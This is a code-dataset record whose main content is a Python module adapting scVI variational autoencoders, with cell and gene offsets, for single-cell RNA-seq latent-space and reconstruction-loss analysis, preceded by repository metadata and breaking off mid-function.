if cmd in CMDS:
return run(cmd, (args[:1] + args[2:]))
else:
print_commands(CMDS)
sys.exit("Unknown command: %s" % cmd)
|
[
"c@c-Latitude-E6410.(none)"
] |
c@c-Latitude-E6410.(none)
|
0d35174dbee1362ac380bf5e44b079d867cc538d
|
33ccdaa6293162511c4ad74284f69b2bd6451044
|
/pyscutils/scvi_utils.py
|
047d3b60725774029d64a5f1cef0c6622d33e66e
|
[
"BSD-3-Clause"
] |
permissive
|
saketkc/pyscutils
|
f3f9199f0c2e3954dc79369b99f4612acd9cf0c2
|
282a6cc707deaee80ab8ebc5596d25b9e21d6ffb
|
refs/heads/master
| 2023-01-23T02:26:28.599751 | 2020-11-19T00:31:07 | 2020-11-19T00:31:07 | 297,775,606 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 50,655 |
py
|
import os
import warnings
warnings.simplefilter("ignore")
import shutil
from typing import Dict, Iterable, List, Tuple
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import proplot
import scanpy as sc
import scvi
import seaborn as sns
import torch
import torch.nn as nn
from adjustText import adjust_text
from scvi import set_seed
from scvi.dataset import AnnDatasetFromAnnData
from scvi.models.utils import one_hot
from scvi.inference import UnsupervisedTrainer, load_posterior
from scvi.models.distributions import (
NegativeBinomial,
Poisson,
ZeroInflatedNegativeBinomial,
)
from scvi.models.log_likelihood import log_nb_positive, log_zinb_positive
from scvi.models.modules import DecoderSCVI, Encoder, FCLayers, LinearDecoderSCVI
from scvi.models.vae import LDVAE, VAE
from torch.distributions import Normal
from torch.distributions import kl_divergence as kl
## Modifications from scVI code marked with '################ ===>'
def compute_scvi_latent(
adata: sc.AnnData,
n_latent: int = 50,
n_encoder: int = 1,
n_epochs: int = 200,
lr: float = 1e-3,
use_batches: bool = False,
use_cuda: bool = False,
linear: bool = False,
cell_offset: str = "none",
gene_offset: str = "none",
ldvae_bias: bool = False,
reconstruction_loss: str = "zinb",
hvg_genes=None,
) -> Tuple[scvi.inference.Posterior, np.ndarray]:
"""Train and return a scVI model and sample a latent space
:param adata: sc.AnnData object non-normalized
:param n_latent: dimension of the latent space
:param n_epochs: number of training epochs
:param lr: learning rate
:param use_batches
:param use_cuda
:return: (scvi.Posterior, latent_space)
"""
# Convert easily to scvi dataset
scviDataset = AnnDatasetFromAnnData(adata)
if isinstance(hvg_genes, int):
scviDataset.subsample_genes(hvg_genes)
# print(scviDataset.X.shape)
# print(scviDataset.X[:10,:5])
# print(scviDataset.raw.X.shape)
if isinstance(scviDataset.X, np.ndarray):
X = scviDataset.X
else:
X = scviDataset.X.toarray()
gene_mean = torch.mean(
torch.from_numpy(X).float().to(torch.cuda.current_device()), dim=1
)
cell_mean = torch.mean(
torch.from_numpy(X).float().to(torch.cuda.current_device()), dim=0
)
# Train a model
if not linear:
vae = VAEGeneCell(
scviDataset.nb_genes,
n_batch=scviDataset.n_batches * use_batches,
n_latent=n_latent,
n_layers=n_encoder,
cell_offset=cell_offset,
gene_offset=gene_offset,
reconstruction_loss=reconstruction_loss,
)
else:
vae = LDVAEGeneCell(
scviDataset.nb_genes,
n_batch=scviDataset.n_batches * use_batches,
n_latent=n_latent,
n_layers_encoder=n_encoder,
cell_offset=cell_offset,
gene_offset=gene_offset,
bias=ldvae_bias,
reconstruction_loss=reconstruction_loss,
)
trainer = UnsupervisedTrainer(vae, scviDataset, train_size=1.0, use_cuda=use_cuda)
trainer.train(n_epochs=n_epochs, lr=lr)
# Extract latent space
posterior = trainer.create_posterior(
trainer.model, scviDataset, indices=np.arange(len(scviDataset))
).sequential()
latent, _, _ = posterior.get_latent()
return posterior, latent, vae, trainer
# Decoder
class DecoderSCVI(nn.Module):
"""Decodes data from latent space of ``n_input`` dimensions ``n_output``
dimensions using a fully-connected neural network of ``n_hidden`` layers.
Parameters
----------
n_input
The dimensionality of the input (latent space)
n_output
The dimensionality of the output (data space)
n_cat_list
A list containing the number of categories
for each category of interest. Each category will be
included using a one-hot encoding
n_layers
The number of fully-connected hidden layers
n_hidden
The number of nodes per hidden layer
dropout_rate
Dropout rate to apply to each of the hidden layers
Returns
-------
"""
def __init__(
self,
n_input: int,
n_output: int,
n_cat_list: Iterable[int] = None,
n_layers: int = 1,
n_hidden: int = 128,
):
super().__init__()
self.px_decoder = FCLayers(
n_in=n_input,
n_out=n_hidden,
n_cat_list=n_cat_list,
n_layers=n_layers,
n_hidden=n_hidden,
dropout_rate=0,
)
# mean gamma
self.px_scale_decoder = nn.Sequential(
nn.Linear(n_hidden, n_output), nn.Softmax(dim=-1)
)
# dispersion: here we only deal with gene-cell dispersion case
self.px_r_decoder = nn.Linear(n_hidden, n_output)
# dropout
self.px_dropout_decoder = nn.Linear(n_hidden, n_output)
def forward(
self, dispersion: str, z: torch.Tensor, library: torch.Tensor, *cat_list: int
):
"""The forward computation for a single sample.
#. Decodes the data from the latent space using the decoder network
#. Returns parameters for the ZINB distribution of expression
#. If ``dispersion != 'gene-cell'`` then value for that param will be ``None``
Parameters
----------
dispersion
One of the following
* ``'gene'`` - dispersion parameter of NB is constant per gene across cells
* ``'gene-batch'`` - dispersion can differ between different batches
* ``'gene-label'`` - dispersion can differ between different labels
* ``'gene-cell'`` - dispersion can differ for every gene in every cell
z :
tensor with shape ``(n_input,)``
library
library size
cat_list
list of category membership(s) for this sample
Returns
-------
4-tuple of :py:class:`torch.Tensor`
parameters for the ZINB distribution of expression
"""
# The decoder returns values for the parameters of the ZINB distribution
px = self.px_decoder(z, *cat_list)
px_scale = self.px_scale_decoder(px)
px_dropout = self.px_dropout_decoder(px)
# Clamp to high value: exp(12) ~ 160000 to avoid nans (computational stability)
px_rate = (torch.exp(library)) * px_scale # torch.clamp( , max=12)
px_r = self.px_r_decoder(px) if dispersion == "gene-cell" else None
return px_scale, px_r, px_rate, px_dropout
## Modifications from scVI code marked with '################ ===>'
class DecoderSCVIGeneCell(DecoderSCVI):
"""Decodes data from latent space of ``n_input`` dimensions ``n_output``
dimensions using a fully-connected neural network of ``n_hidden`` layers.
Parameters
----------
n_input
The dimensionality of the input (latent space)
n_output
The dimensionality of the output (data space)
n_cat_list
A list containing the number of categories
for each category of interest. Each category will be
included using a one-hot encoding
n_layers
The number of fully-connected hidden layers
n_hidden
The number of nodes per hidden layer
dropout_rate
Dropout rate to apply to each of the hidden layers
Returns
-------
"""
def __init__(
self,
n_input: int,
n_output: int,
n_cat_list: Iterable[int] = None,
n_layers: int = 1,
n_hidden: int = 128,
):
super().__init__(n_input, n_output, n_cat_list, n_layers, n_hidden)
def forward(
self,
dispersion: str,
z: torch.Tensor,
library: torch.Tensor,
*cat_list: int,
cell_offset: torch.Tensor,
gene_offset: torch.Tensor,
dispersion_clamp: list,
):
"""The forward computation for a single sample.
#. Decodes the data from the latent space using the decoder network
#. Returns parameters for the ZINB distribution of expression
#. If ``dispersion != 'gene-cell'`` then value for that param will be ``None``
Parameters
----------
dispersion
One of the following
* ``'gene'`` - dispersion parameter of NB is constant per gene across cells
* ``'gene-batch'`` - dispersion can differ between different batches
* ``'gene-label'`` - dispersion can differ between different labels
* ``'gene-cell'`` - dispersion can differ for every gene in every cell
z :
tensor with shape ``(n_input,)``
library
library size
cat_list
list of category membership(s) for this sample
Returns
-------
4-tuple of :py:class:`torch.Tensor`
parameters for the ZINB distribution of expression
"""
# The decoder returns values for the parameters of the ZINB distribution
px = self.px_decoder(z, *cat_list)
px_scale = self.px_scale_decoder(px)
px_dropout = self.px_dropout_decoder(px)
# Clamp to high value: exp(12) ~ 160000 to avoid nans (computational stability
################ ===>
cell_offset = torch.reshape(cell_offset, (cell_offset.shape[0], 1))
px_rate = (
(torch.exp(library) * (cell_offset)) * px_scale * gene_offset
) # torch.clamp( , max=12)
px_rate = (
(torch.exp(library) * (cell_offset)) * px_scale * gene_offset
) # torch.clamp( , max=12)
# px_rate = cell_offset #torch.exp(library) + cell_mean * px_scale # torch.clamp( , max=12)
# px_rate = torch.exp(library + cell_mean) * px_scale # torch.clamp( , max=12)
px_r = self.px_r_decoder(px) if dispersion == "gene-cell" else None
if dispersion == "gene-cell" and dispersion_clamp:
px_r = torch.clamp(px_r, min=dispersion_clamp[0], max=dispersion_clamp[1])
return px_scale, px_r, px_rate, px_dropout
class LinearDecoderSCVIGeneCell(nn.Module):
def __init__(
self,
n_input: int,
n_output: int,
n_cat_list: Iterable[int] = None,
use_batch_norm: bool = True,
bias: bool = False,
):
super(LinearDecoderSCVIGeneCell, self).__init__()
# mean gamma
self.factor_regressor = FCLayers(
n_in=n_input,
n_out=n_output,
n_cat_list=n_cat_list,
n_layers=1,
use_relu=False,
use_batch_norm=use_batch_norm,
bias=bias,
dropout_rate=0,
)
# dropout
self.px_dropout_decoder = FCLayers(
n_in=n_input,
n_out=n_output,
n_cat_list=n_cat_list,
n_layers=1,
use_relu=False,
use_batch_norm=use_batch_norm,
bias=bias,
dropout_rate=0,
)
def forward(
self,
dispersion: str,
z: torch.Tensor,
library: torch.Tensor,
*cat_list: int,
cell_offset: torch.Tensor,
gene_offset: torch.Tensor,
):
# The decoder returns values for the parameters of the ZINB distribution
raw_px_scale = self.factor_regressor(z, *cat_list)
px_scale = torch.softmax(raw_px_scale, dim=-1)
px_dropout = self.px_dropout_decoder(z, *cat_list)
##px_rate = torch.exp(library) * px_scale
################ ===>
cell_offset = torch.reshape(cell_offset, (cell_offset.shape[0], 1))
px_rate = (
(torch.exp(library) * cell_offset) * px_scale * gene_offset
) # torch.clamp( , max=12)
px_r = None
return px_scale, px_r, px_rate, px_dropout
# VAEGeneCell model
class VAEGeneCell(nn.Module):
"""Variational auto-encoder model.
This is an implementation of the scVI model descibed in [Lopez18]_
Parameters
----------
n_input
Number of input genes
n_batch
Number of batches, if 0, no batch correction is performed.
n_labels
Number of labels
n_hidden
Number of nodes per hidden layer
n_latent
Dimensionality of the latent space
n_layers
Number of hidden layers used for encoder and decoder NNs
dropout_rate
Dropout rate for neural networks
dispersion
One of the following
* ``'gene'`` - dispersion parameter of NB is constant per gene across cells
* ``'gene-batch'`` - dispersion can differ between different batches
* ``'gene-label'`` - dispersion can differ between different labels
* ``'gene-cell'`` - dispersion can differ for every gene in every cell
log_variational
Log(data+1) prior to encoding for numerical stability. Not normalization.
reconstruction_loss
One of
* ``'nb'`` - Negative binomial distribution
* ``'zinb'`` - Zero-inflated negative binomial distribution
* ``'poisson'`` - Poisson distribution
Examples
--------
>>> gene_dataset = CortexDataset()
>>> vae = VAE(gene_dataset.nb_genes, n_batch=gene_dataset.n_batches * False,
... n_labels=gene_dataset.n_labels)
"""
def __init__(
self,
n_input: int,
n_batch: int = 0,
n_labels: int = 0,
n_hidden: int = 128,
n_latent: int = 10,
n_layers: int = 1,
dropout_rate: float = 0.1,
dispersion: str = "gene",
log_variational: bool = True,
reconstruction_loss: str = "zinb",
latent_distribution: str = "normal",
cell_offset: str = "none", ################ ===>
gene_offset: str = "none", ################ ===>
dispersion_clamp: list = [],
beta_disentanglement: float = 1.0,
kl_type: str = "reverse",
):
super().__init__()
self.dispersion = dispersion
self.n_latent = n_latent
self.log_variational = log_variational
self.reconstruction_loss = reconstruction_loss
# Automatically deactivate if useless
self.n_batch = n_batch
self.n_labels = n_labels
self.latent_distribution = latent_distribution
################ ===>
self.cell_offset = cell_offset
self.gene_offset = gene_offset
self.dispersion_clamp = dispersion_clamp
self.beta_disentanglement = beta_disentanglement
self.kl_type = kl_type
if self.dispersion == "gene":
self.px_r = torch.nn.Parameter(torch.randn(n_input))
elif self.dispersion == "gene-batch":
self.px_r = torch.nn.Parameter(torch.randn(n_input, n_batch))
elif self.dispersion == "gene-label":
self.px_r = torch.nn.Parameter(torch.randn(n_input, n_labels))
elif self.dispersion == "gene-cell":
pass
else:
raise ValueError(
"dispersion must be one of ['gene', 'gene-batch',"
" 'gene-label', 'gene-cell'], but input was "
"{}.format(self.dispersion)"
)
# z encoder goes from the n_input-dimensional data to an n_latent-d
# latent space representation
self.z_encoder = Encoder(
n_input,
n_latent,
n_layers=n_layers,
n_hidden=n_hidden,
dropout_rate=dropout_rate,
distribution=latent_distribution,
)
# l encoder goes from n_input-dimensional data to 1-d library size
self.l_encoder = Encoder(
n_input, 1, n_layers=1, n_hidden=n_hidden, dropout_rate=dropout_rate
)
# decoder goes from n_latent-dimensional space to n_input-d data
################ ===>
self.decoder = DecoderSCVIGeneCell(
n_latent,
n_input,
n_cat_list=[n_batch],
n_layers=n_layers,
n_hidden=n_hidden,
)
def get_latents(self, x, y=None) -> torch.Tensor:
"""Returns the result of ``sample_from_posterior_z`` inside a list
Parameters
----------
x
tensor of values with shape ``(batch_size, n_input)``
y
tensor of cell-types labels with shape ``(batch_size, n_labels)`` (Default value = None)
Returns
-------
type
one element list of tensor
"""
return [self.sample_from_posterior_z(x, y)]
def sample_from_posterior_z(
self, x, y=None, give_mean=False, n_samples=5000
) -> torch.Tensor:
"""Samples the tensor of latent values from the posterior
Parameters
----------
x
tensor of values with shape ``(batch_size, n_input)``
y
tensor of cell-types labels with shape ``(batch_size, n_labels)`` (Default value = None)
give_mean
is True when we want the mean of the posterior distribution rather than sampling (Default value = False)
n_samples
how many MC samples to average over for transformed mean (Default value = 5000)
Returns
-------
type
tensor of shape ``(batch_size, n_latent)``
"""
if self.log_variational:
x = torch.log(1 + x)
qz_m, qz_v, z = self.z_encoder(x, y) # y only used in VAEC
if give_mean:
if self.latent_distribution == "ln":
samples = Normal(qz_m, qz_v.sqrt()).sample([n_samples])
z = self.z_encoder.z_transformation(samples)
z = z.mean(dim=0)
else:
z = qz_m
return z
def sample_from_posterior_l(self, x) -> torch.Tensor:
"""Samples the tensor of library sizes from the posterior
Parameters
----------
x
tensor of values with shape ``(batch_size, n_input)``
y
tensor of cell-types labels with shape ``(batch_size, n_labels)``
Returns
-------
type
tensor of shape ``(batch_size, 1)``
"""
if self.log_variational:
x = torch.log(1 + x)
ql_m, ql_v, library = self.l_encoder(x)
return library
def get_sample_scale(
self, x, batch_index=None, y=None, n_samples=1, transform_batch=None
) -> torch.Tensor:
"""Returns the tensor of predicted frequencies of expression
Parameters
----------
x
tensor of values with shape ``(batch_size, n_input)``
batch_index
array that indicates which batch the cells belong to with shape ``batch_size`` (Default value = None)
y
tensor of cell-types labels with shape ``(batch_size, n_labels)`` (Default value = None)
n_samples
number of samples (Default value = 1)
transform_batch
int of batch to transform samples into (Default value = None)
Returns
-------
type
tensor of predicted frequencies of expression with shape ``(batch_size, n_input)``
"""
return self.inference(
x,
batch_index=batch_index,
y=y,
n_samples=n_samples,
transform_batch=transform_batch,
)["px_scale"]
def get_sample_rate(
self, x, batch_index=None, y=None, n_samples=1, transform_batch=None
) -> torch.Tensor:
"""Returns the tensor of means of the negative binomial distribution
Parameters
----------
x
tensor of values with shape ``(batch_size, n_input)``
y
tensor of cell-types labels with shape ``(batch_size, n_labels)`` (Default value = None)
batch_index
array that indicates which batch the cells belong to with shape ``batch_size`` (Default value = None)
n_samples
number of samples (Default value = 1)
transform_batch
int of batch to transform samples into (Default value = None)
Returns
-------
type
tensor of means of the negative binomial distribution with shape ``(batch_size, n_input)``
"""
return self.inference(
x,
batch_index=batch_index,
y=y,
n_samples=n_samples,
transform_batch=transform_batch,
)["px_rate"]
def get_reconstruction_loss(
self, x, px_rate, px_r, px_dropout, **kwargs
) -> torch.Tensor:
# Reconstruction Loss
px_rate_ = px_rate
if self.reconstruction_loss == "zinb":
reconst_loss = (
-ZeroInflatedNegativeBinomial(
mu=px_rate_, theta=px_r, zi_logits=px_dropout
)
.log_prob(x)
.sum(dim=-1)
)
elif self.reconstruction_loss == "nb":
reconst_loss = (
-NegativeBinomial(mu=px_rate_, theta=px_r).log_prob(x).sum(dim=-1)
)
elif self.reconstruction_loss == "poisson":
reconst_loss = -Poisson(px_rate_).log_prob(x).sum(dim=-1)
return reconst_loss
def inference(
self, x, batch_index=None, y=None, n_samples=1, transform_batch=None, **kwargs
) -> Dict[str, torch.Tensor]:
"""Helper function used in forward pass"""
x_ = x
if self.log_variational:
x_ = torch.log(1 + x_)
# Sampling
qz_m, qz_v, z = self.z_encoder(x_, y)
ql_m, ql_v, library = self.l_encoder(x_)
if n_samples > 1:
qz_m = qz_m.unsqueeze(0).expand((n_samples, qz_m.size(0), qz_m.size(1)))
qz_v = qz_v.unsqueeze(0).expand((n_samples, qz_v.size(0), qz_v.size(1)))
# when z is normal, untran_z == z
untran_z = Normal(qz_m, qz_v.sqrt()).sample()
z = self.z_encoder.z_transformation(untran_z)
ql_m = ql_m.unsqueeze(0).expand((n_samples, ql_m.size(0), ql_m.size(1)))
ql_v = ql_v.unsqueeze(0).expand((n_samples, ql_v.size(0), ql_v.size(1)))
library = Normal(ql_m, ql_v.sqrt()).sample()
if transform_batch is not None:
dec_batch_index = transform_batch * torch.ones_like(batch_index)
else:
dec_batch_index = batch_index
################ ===>
try: # if use_cuda:
cell_offset = torch.ones(x.shape[0]).to(torch.cuda.current_device())
gene_offset = torch.ones(x.shape[1]).to(torch.cuda.current_device())
except:
cell_offset = torch.ones(x.shape[0])
gene_offset = torch.ones(x.shape[1])
if self.cell_offset == "count":
cell_offset = torch.sum(x, dim=1)
elif self.cell_offset == "mean":
cell_offset = torch.mean(x, dim=1)
if self.gene_offset == "count":
gene_offset = torch.sum(x, dim=0)
elif self.gene_offset == "mean":
gene_offset = torch.mean(x, dim=0)
px_scale, px_r, px_rate, px_dropout = self.decoder(
self.dispersion,
z,
library,
dec_batch_index,
y,
cell_offset=cell_offset, ################ ===>
gene_offset=gene_offset, ################ ===>
dispersion_clamp=self.dispersion_clamp,
)
if self.dispersion == "gene-label":
px_r = F.linear(
one_hot(y, self.n_labels), self.px_r
) # px_r gets transposed - last dimension is nb genes
elif self.dispersion == "gene-batch":
px_r = F.linear(one_hot(dec_batch_index, self.n_batch), self.px_r)
elif self.dispersion == "gene":
px_r = self.px_r
px_r = torch.exp(px_r)
return dict(
px_scale=px_scale,
px_r=px_r,
px_rate=px_rate,
px_dropout=px_dropout,
qz_m=qz_m,
qz_v=qz_v,
z=z,
ql_m=ql_m,
ql_v=ql_v,
library=library,
)
def forward(
self, x, local_l_mean, local_l_var, batch_index=None, y=None
) -> Tuple[torch.Tensor, torch.Tensor]:
"""Returns the reconstruction loss and the KL divergences
Parameters
----------
x
tensor of values with shape (batch_size, n_input)
local_l_mean
tensor of means of the prior distribution of latent variable l
with shape (batch_size, 1)
local_l_var
tensor of variancess of the prior distribution of latent variable l
with shape (batch_size, 1)
batch_index
array that indicates which batch the cells belong to with shape ``batch_size`` (Default value = None)
y
tensor of cell-types labels with shape (batch_size, n_labels) (Default value = None)
Returns
-------
type
the reconstruction loss and the Kullback divergences
"""
# Parameters for z latent distribution
outputs = self.inference(x, batch_index, y)
qz_m = outputs["qz_m"]
qz_v = outputs["qz_v"]
ql_m = outputs["ql_m"]
ql_v = outputs["ql_v"]
px_rate = outputs["px_rate"]
px_r = outputs["px_r"]
px_dropout = outputs["px_dropout"]
# KL Divergence
mean = torch.zeros_like(qz_m)
scale = torch.ones_like(qz_v)
# only use it on mean
if self.kl_type == "reverse":
kl_divergence_z = kl(
Normal(qz_m, torch.sqrt(qz_v)), Normal(mean, scale)
).sum(dim=1)
elif self.kl_type == "forward":
kl_divergence_z = kl(
Normal(mean, scale), Normal(qz_m, torch.sqrt(qz_v))
).sum(dim=1)
elif self.kl_type == "symmetric":
p_sum_q = Normal(mean + qz_m, scale + torch.sqrt(qz_v))
kl_divergence_z_f = kl(Normal(mean, scale), p_sum_q).sum(dim=1)
kl_divergence_z_r = kl(Normal(qz_m, torch.sqrt(qz_v)), p_sum_q).sum(dim=1)
kl_divergence_z = 0.5 * (kl_divergence_z_f + kl_divergence_z_r)
kl_divergence_l = kl(
Normal(ql_m, torch.sqrt(ql_v)),
Normal(local_l_mean, torch.sqrt(local_l_var)),
).sum(dim=1)
kl_divergence = kl_divergence_z * self.beta_disentanglement
reconst_loss = self.get_reconstruction_loss(
x,
px_rate,
px_r,
px_dropout,
)
return reconst_loss + kl_divergence_l, kl_divergence, 0.0
class LDVAEGeneCell(VAEGeneCell):
"""Linear-decoded Variational auto-encoder model.
Implementation of [Svensson20]_.
This model uses a linear decoder, directly mapping the latent representation
to gene expression levels. It still uses a deep neural network to encode
the latent representation.
Compared to standard VAE, this model is less powerful, but can be used to
inspect which genes contribute to variation in the dataset. It may also be used
for all scVI tasks, like differential expression, batch correction, imputation, etc.
However, batch correction may be less powerful as it assumes a linear model.
Parameters
----------
n_input
Number of input genes
n_batch
Number of batches
n_labels
Number of labels
n_hidden
Number of nodes per hidden layer (for encoder)
n_latent
Dimensionality of the latent space
n_layers_encoder
Number of hidden layers used for encoder NNs
dropout_rate
Dropout rate for neural networks
dispersion
One of the following
* ``'gene'`` - dispersion parameter of NB is constant per gene across cells
* ``'gene-batch'`` - dispersion can differ between different batches
* ``'gene-label'`` - dispersion can differ between different labels
* ``'gene-cell'`` - dispersion can differ for every gene in every cell
log_variational
Log(data+1) prior to encoding for numerical stability. Not normalization.
reconstruction_loss
One of
* ``'nb'`` - Negative binomial distribution
* ``'zinb'`` - Zero-inflated negative binomial distribution
use_batch_norm
Bool whether to use batch norm in decoder
bias
Bool whether to have bias term in linear decoder
"""
def __init__(
self,
n_input: int,
n_batch: int = 0,
n_labels: int = 0,
n_hidden: int = 128,
n_latent: int = 10,
n_layers_encoder: int = 1,
dropout_rate: float = 0.1,
dispersion: str = "gene",
log_variational: bool = True,
reconstruction_loss: str = "nb",
use_batch_norm: bool = True,
bias: bool = False,
latent_distribution: str = "normal",
cell_offset: str = "none",
gene_offset: str = "none",
):
super().__init__(
n_input,
n_batch,
n_labels,
n_hidden,
n_latent,
n_layers_encoder,
dropout_rate,
dispersion,
log_variational,
reconstruction_loss,
latent_distribution,
cell_offset, ################ ===>
gene_offset, ################ ===>
)
self.use_batch_norm = use_batch_norm
self.z_encoder = Encoder(
n_input,
n_latent,
n_layers=n_layers_encoder,
n_hidden=n_hidden,
dropout_rate=dropout_rate,
distribution=latent_distribution,
)
################ ===>
self.decoder = LinearDecoderSCVIGeneCell(
n_latent,
n_input,
n_cat_list=[n_batch],
use_batch_norm=use_batch_norm,
bias=bias,
)
@torch.no_grad()
def get_loadings(self) -> np.ndarray:
"""Extract per-gene weights (for each Z, shape is genes by dim(Z)) in the linear decoder."""
# This is BW, where B is diag(b) batch norm, W is weight matrix
if self.use_batch_norm is True:
w = self.decoder.factor_regressor.fc_layers[0][0].weight
bn = self.decoder.factor_regressor.fc_layers[0][1]
sigma = torch.sqrt(bn.running_var + bn.eps)
gamma = bn.weight
b = gamma / sigma
bI = torch.diag(b)
loadings = torch.matmul(bI, w)
else:
loadings = self.decoder.factor_regressor.fc_layers[0][0].weight
loadings = loadings.detach().cpu().numpy()
if self.n_batch > 1:
loadings = loadings[:, : -self.n_batch]
return loadings
def compute_scvi_latent(
adata: sc.AnnData,
n_latent: int = 50,
n_encoder: int = 1,
n_epochs: int = 200,
lr: float = 1e-3,
use_batches: bool = False,
use_cuda: bool = False,
linear: bool = False,
cell_offset: str = "none",
gene_offset: str = "none",
ldvae_bias: bool = False,
reconstruction_loss: str = "zinb",
dispersion: str = "gene",
hvg_genes="all",
point_size=10,
dispersion_clamp=[],
beta_disentanglement=1.0,
kl_type="reverse",
) -> Tuple[scvi.inference.Posterior, np.ndarray]:
"""Train and return a scVI model and sample a latent space
:param adata: sc.AnnData object non-normalized
:param n_latent: dimension of the latent space
:param n_epochs: number of training epochs
:param lr: learning rate
:param use_batches
:param use_cuda
:return: (scvi.Posterior, latent_space)
"""
# Convert easily to scvi dataset
scviDataset = AnnDatasetFromAnnData(adata)
if isinstance(hvg_genes, int):
scviDataset.subsample_genes(hvg_genes)
if isinstance(scviDataset.X, np.ndarray):
X = scviDataset.X
else:
X = scviDataset.X.toarray()
# Train a model
if not linear:
vae = VAEGeneCell(
scviDataset.nb_genes,
n_batch=scviDataset.n_batches * use_batches,
n_latent=n_latent,
n_layers=n_encoder,
cell_offset=cell_offset,
gene_offset=gene_offset,
reconstruction_loss=reconstruction_loss,
dispersion=dispersion,
dispersion_clamp=dispersion_clamp,
beta_disentanglement=beta_disentanglement,
kl_type=kl_type,
)
else:
vae = LDVAEGeneCell(
scviDataset.nb_genes,
n_batch=scviDataset.n_batches * use_batches,
n_latent=n_latent,
n_layers_encoder=n_encoder,
cell_offset=cell_offset,
gene_offset=gene_offset,
bias=ldvae_bias,
reconstruction_loss=reconstruction_loss,
dispersion=dispersion,
)
trainer = UnsupervisedTrainer(vae, scviDataset, train_size=1.0, use_cuda=use_cuda)
trainer.train(n_epochs=n_epochs, lr=lr)
# Extract latent space
posterior = trainer.create_posterior(
trainer.model, scviDataset, indices=np.arange(len(scviDataset))
).sequential()
latent, _, _ = posterior.get_latent()
return posterior, latent, vae, trainer
def RunVAE(
adata,
reconstruction_loss,
n_latent=30,
n_encoder=1,
linear=False,
cell_offset="none",
gene_offset="none",
ldvae=False,
ldvae_bias=False,
title_prefix="",
dispersion="gene",
hvg_genes="all",
point_size=5,
n_epochs=200,
lr=1e-3,
batch_size=1000,
use_cuda=False,
legend_loc="on data",
figsize=(10, 5),
legend_fontweight="normal",
sct_cell_pars=None,
outdir=None,
sct_gene_pars=None,
sct_model_pars_fit=None,
dispersion_clamp=[],
beta_disentanglement=1.0,
kl_type="reverse",
):
sct_gene_pars_df = pd.read_csv(sct_gene_pars, sep="\t", index_col=0)
sct_model_pars_fit_df = pd.read_csv(sct_model_pars_fit, sep="\t", index_col=0)
sct_model_paras_withgmean = sct_model_pars_fit_df.join(sct_gene_pars_df)
scvi_posterior, scvi_latent, scvi_vae, scvi_trainer = compute_scvi_latent(
adata,
n_encoder=n_encoder,
n_epochs=n_epochs,
n_latent=n_latent,
use_cuda=use_cuda,
linear=linear,
cell_offset=cell_offset,
gene_offset=gene_offset,
reconstruction_loss=reconstruction_loss,
dispersion=dispersion,
hvg_genes=hvg_genes,
dispersion_clamp=dispersion_clamp,
beta_disentanglement=beta_disentanglement,
kl_type=kl_type,
)
suffix = "_{}_{}_{}_{}".format(
cell_offset, gene_offset, reconstruction_loss, dispersion
)
scviDataset = AnnDatasetFromAnnData(adata)
if isinstance(hvg_genes, int):
scviDataset.subsample_genes(hvg_genes)
# posterior freq of genes per cell
# scale = scvi_posterior.sequential(batch_size=batch_size).get_sample_scale()
# scale = scale.detach()
scale = scvi_posterior.get_sample_scale()
# batch_size=batch_size
for _ in range(99):
scale += scvi_posterior.get_sample_scale()
scale /= 100
scale_df = pd.DataFrame(scale)
scale_df.index = list(adata.obs_names)
scale_df.columns = list(scviDataset.gene_ids)
scale_df = scale_df.T
scvi_latent_df = pd.DataFrame(scvi_latent)
scvi_latent_df.index = list(adata.obs_names)
if outdir:
os.makedirs(outdir, exist_ok=True)
scale_df.to_csv(
os.path.join(outdir, "SCVI_scale_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
scvi_latent_df.to_csv(
os.path.join(outdir, "SCVI_latent_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
adata.obsm["X_scvi"] = scvi_latent
for gene, gene_scale in zip(adata.var.index, np.squeeze(scale).T):
adata.obs["scale_" + gene] = gene_scale
sc.pp.neighbors(adata, use_rep="X_scvi", n_neighbors=20, n_pcs=30)
sc.tl.umap(adata, min_dist=0.3)
sc.tl.leiden(adata, key_added="X_scvi", resolution=0.8)
X_umap = adata.obsm["X_umap"]
X_umap_df = pd.DataFrame(X_umap)
X_umap_df.index = list(adata.obs_names)
if outdir:
X_umap_df.to_csv(
os.path.join(outdir, "SCVI_Xumap_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
scviDataset = AnnDatasetFromAnnData(adata)
if isinstance(hvg_genes, int):
scviDataset.subsample_genes(hvg_genes)
if isinstance(scviDataset.X, np.ndarray):
X = scviDataset.X
else:
X = scviDataset.X.toarray()
try:
X = torch.from_numpy(X).float().to(torch.cuda.current_device())
batch = torch.from_numpy(scviDataset.batch_indices.astype(float)).to(
torch.cuda.current_device()
)
except:
X = torch.from_numpy(X).float()
batch = torch.from_numpy(scviDataset.batch_indices.astype(float))
inference = scvi_vae.inference(X, batch)
# torch.cuda.empty_cache()
if reconstruction_loss == "nb":
reconst_loss = log_nb_positive(
X,
inference["px_rate"],
inference["px_r"],
inference["px_dropout"],
)
elif reconstruction_loss == "zinb":
reconst_loss = log_zinb_positive(
X,
inference["px_rate"],
inference["px_r"],
inference["px_dropout"],
)
gene_loss = np.nansum(reconst_loss.detach().cpu().numpy(), axis=0)
cell_loss = np.nansum(reconst_loss.detach().cpu().numpy(), axis=1)
gene_mean = np.array(adata[:, scviDataset.gene_names].X.mean(0))[0]
if not gene_mean.shape:
# TODO: need to handle this more gracefully
gene_mean = np.array(adata[:, scviDataset.gene_names].X.mean(0))
cell_mean = np.array(adata[:, scviDataset.gene_names].X.mean(1)).flatten()
fig1 = plt.figure(figsize=figsize)
ax = fig1.add_subplot(121)
ax.scatter(
gene_mean, gene_loss, label="Gene", alpha=0.5, color="black", s=point_size
)
gene_loss_df = pd.DataFrame([gene_mean, gene_loss])
gene_loss_df = gene_loss_df.T
gene_loss_df.index = list(scviDataset.gene_names)
gene_loss_df.columns = ["gene_mean", "gene_loss"]
cell_loss_df = pd.DataFrame([cell_mean, cell_loss])
cell_loss_df = cell_loss_df.T
cell_loss_df.index = list(adata.obs_names)
cell_loss_df.columns = ["cell_mean", "cell_loss"]
if outdir:
gene_loss_df.to_csv(
os.path.join(outdir, "SCVI_geneloss_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
cell_loss_df.to_csv(
os.path.join(outdir, "SCVI_cellloss_df_{}.tsv".format(suffix)),
sep="\t",
